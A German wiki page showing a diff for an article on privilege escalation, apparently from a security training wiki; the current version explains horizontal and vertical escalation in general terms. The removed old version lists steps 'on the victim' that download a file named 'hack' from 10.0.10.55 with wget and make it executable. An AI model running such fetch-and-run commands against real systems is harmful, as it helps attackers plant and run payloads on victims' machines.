Privilege Escalation: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
 
(12 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt)
Zeile 1: Zeile 1:
=Wieder auf den Opfer=
+
=Was ist das?=
*cd /tmp
+
 
*wget http://10.0.10.55/hack
+
*Bei einer Privilege Escalation (Rechteerweiterung) nutzt ein Angreifer Schwachstellen, Fehlkonfigurationen oder Designfehler aus, um auf einem System höhere Rechte zu erlangen.
*chmod +x hack
+
*Typische Ziele sind der Wechsel von einem eingeschränkten Benutzerkonto zu root oder Administratorrechten.
 +
*Privilege Escalation wird fast immer in Kombination mit anderen Angriffstechniken verwendet, um aus einem ersten Zugriff (z.B. nach Command Injection oder Initial Access) einen vollständigen Systemkompromiss zu erreichen.
 +
*Man unterscheidet zwischen '''horizontaler''' Privilege Escalation (gleichwertige Accounts kompromittieren) und '''vertikaler''' Privilege Escalation (höhere Berechtigungen erlangen).
 +
*Dieser Angriffstyp ist besonders gefährlich, weil er bestehende Schutzmechanismen wie Benutzerisolation, Rollenmodelle oder Containergrenzen direkt unterlaufen kann.
 +
 
 +
=Beispiele=
 +
*[[Privilege Escalation Beispiele]]
 +
[[Kategorie:Privilege Escalation]]
 +
[[Kategorie:Privilege Hacking]]
 +
[[Kategorie:Cybersecurity]]
 +
[[Kategorie:Kali]]

Aktuelle Version vom 18. Mai 2025, 17:09 Uhr

Was ist das?

  • Bei einer Privilege Escalation (Rechteerweiterung) nutzt ein Angreifer Schwachstellen, Fehlkonfigurationen oder Designfehler aus, um auf einem System höhere Rechte zu erlangen.
  • Typische Ziele sind der Wechsel von einem eingeschränkten Benutzerkonto zu root oder Administratorrechten.
  • Privilege Escalation wird fast immer in Kombination mit anderen Angriffstechniken verwendet, um aus einem ersten Zugriff (z.B. nach Command Injection oder Initial Access) einen vollständigen Systemkompromiss zu erreichen.
  • Man unterscheidet zwischen horizontaler Privilege Escalation (gleichwertige Accounts kompromittieren) und vertikaler Privilege Escalation (höhere Berechtigungen erlangen).
  • Dieser Angriffstyp ist besonders gefährlich, weil er bestehende Schutzmechanismen wie Benutzerisolation, Rollenmodelle oder Containergrenzen direkt unterlaufen kann.

Beispiele